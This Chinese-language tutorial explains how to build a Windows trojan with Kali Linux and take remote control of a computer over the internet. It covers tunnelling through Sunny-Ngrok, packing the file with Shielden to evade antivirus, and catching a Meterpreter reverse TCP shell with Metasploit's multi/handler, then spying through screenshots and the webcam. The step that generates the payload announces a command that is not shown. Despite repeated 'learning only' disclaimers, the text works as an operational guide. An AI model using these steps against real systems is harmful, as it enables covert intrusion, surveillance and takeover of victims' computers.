使用Kali Linux系统生成木马病毒并实现远程控制计算机
使用KALI生成木马病毒实现远程控制
前言
本文旨在学习使用Kali Linux系统,不得将其用于非法目的。我将详细介绍使用Kali Linux系统生成木马病毒,并利用它远程控制一台位于外网的物理计算机。所需工具如下:
- VMware Workstation Pro 16(虚拟机)- 下载地址
- Kali Linux 2021(系统)- 下载地址
- Sunny-Ngrok(内网穿透服务)- 登录地址
- Shielden(加壳小工具)- 下载地址
网络如山勤思为径,信息似海安全作舟。让我们开始下面的学习。
一、安装虚拟机和系统
安装步骤简单,请自行百度。网络适配器选择桥接模式,确保Kali Linux能够连接到互联网。
二、开通隧道
注册并登录Sunny-Ngrok,根据个人情况选择开通一条隧道。我选择了免费的选项。隧道协议选择TCP,隧道名称任意,远程端口选择一个可用的端口(系统会推荐几个可用端口),本地端口填写Kali Linux系统的IP地址(使用ifconfig命令查看),冒号后面填写一个喜欢的数字(我通常使用8888)。本地端口可以随时修改,确认信息无误后点击确认添加。
三、打开隧道管理
打开隧道管理,点击客户端下载,将下载后的压缩文件拖入Kali Linux系统并解压。使用cd命令进入该文件夹,通过ls命令查看其中的"sunny"文件。通过./sunny clientid 隧道ID命令开启隧道。
四、生成木马
打开一个新的终端窗口,输入以下命令并回车,它将在root文件夹下生成一个名为muma.exe的Windows可执行文件。此时请注意,先退出物理机上的所有杀毒软件,因为这是一个未加壳的木马文件,可能会立即被删除。退出杀毒软件后,将muma.exe拖入物理机即可。
五、加壳免杀
为了防止被杀毒软件删除,需要对木马进行加壳。这里使用一个简单方便的加壳工具:Shielden。将muma.exe拖入工具中,设置一些参数。如果对该工具不熟悉,可以百度学习一下。如果觉得麻烦,可以选择全部默认设置。注意,加壳复杂度不要设置得太高(我通常设置为66),否则可能导致程序失效。加壳成功后,得到的病毒文件可以绕过一些杀毒软件,但并不是完全免杀。在遇到一些强力杀毒软件时,仍可能被杀掉。请不要将其用于非法目的。
六、远程控制
只要木马程序没有被杀掉,它可以在任何计算机上进行远程控制。为了更加直观,我将使用我的物理机作为被控制对象。打开终端,输入msfconsole并回车,这将打开msfconsole。输入use exploit/multi/handler并回车。输入set payload windows/meterpreter/reverse_tcp并回车。输入show options并查看Lhost和Lport是否为空或不匹配,如果是,需要手动设置它们。输入set lhost本地IP和set lport本地端口,然后再次使用show options命令,可以看到我们设置的信息。使用run命令启动并开始监听。此时双击物理机上的木马程序,终端窗口将有所反应。
到此,我们获得了对物理机的控制权。可以使用一些有趣的meterpreter命令,如查看物理机的IP地址(ipconfig),甚至截取物理机的屏幕,调用物理机的摄像头拍照等等。由于大部分命令无法通过截图直观地展示,其他有趣的命令需要您自行探索,百度上有很多资料。请记住,本文仅用于学习使用Kali Linux系统,请勿将其用于非法目的。网络并非无法之地,对每个计算机使用者来说,网络安全意识是最基本的要求。让我们共同努力,共建良好的网络环境。我一直坚持“分享知识”的原则,强调“免费透明”。如果本文对您有帮助,请给个赞吧!(#^.^#)
